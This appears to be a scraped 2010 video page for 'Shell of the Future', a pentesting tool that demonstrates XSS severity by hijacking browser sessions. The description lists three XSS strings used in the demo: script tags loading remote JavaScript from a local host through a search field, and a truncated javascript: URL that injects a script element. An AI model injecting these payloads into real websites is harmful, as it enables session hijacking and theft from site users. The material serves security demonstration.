Loading...

Shell of the Future - Revere Web Shell Handler for XSS Exploitation

8,688 views

Loading...

Loading...

Loading...

Rating is available when the video has been rented.
This feature is not available right now. Please try again later.
Uploaded on Jul 18, 2010

Shell of the Future is a tool designed to help Pentesters demonstrate the severity of XSS with the same ease getting an alert box to pop-up. The tool is available at http://www.andlabs.org/tools.html#sotf

XSS Strings injected in the video:

#1
<script src="http://127.0.0.1/e1.js"> </script>
Injected in to Search field

#2
<script src="http://127.0.0.1/e2.js"> </script>
Injected in to Search field

#3
javascript:eval("s=document.createElement('script');s.src='http://127.0.0.1/e1.js';document.getE...)[0].appendChild(s)")
Injected in to the address bar

Loading...

When autoplay is enabled, a suggested video will automatically play next.

Up next


to add this to Watch Later

Add to

Loading playlists...